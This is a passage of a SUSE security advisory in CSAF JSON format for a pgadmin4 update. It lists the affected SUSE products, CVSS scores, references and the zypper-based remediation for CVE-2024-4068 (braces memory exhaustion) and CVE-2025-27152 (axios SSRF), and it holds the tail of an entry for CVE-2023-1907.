"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
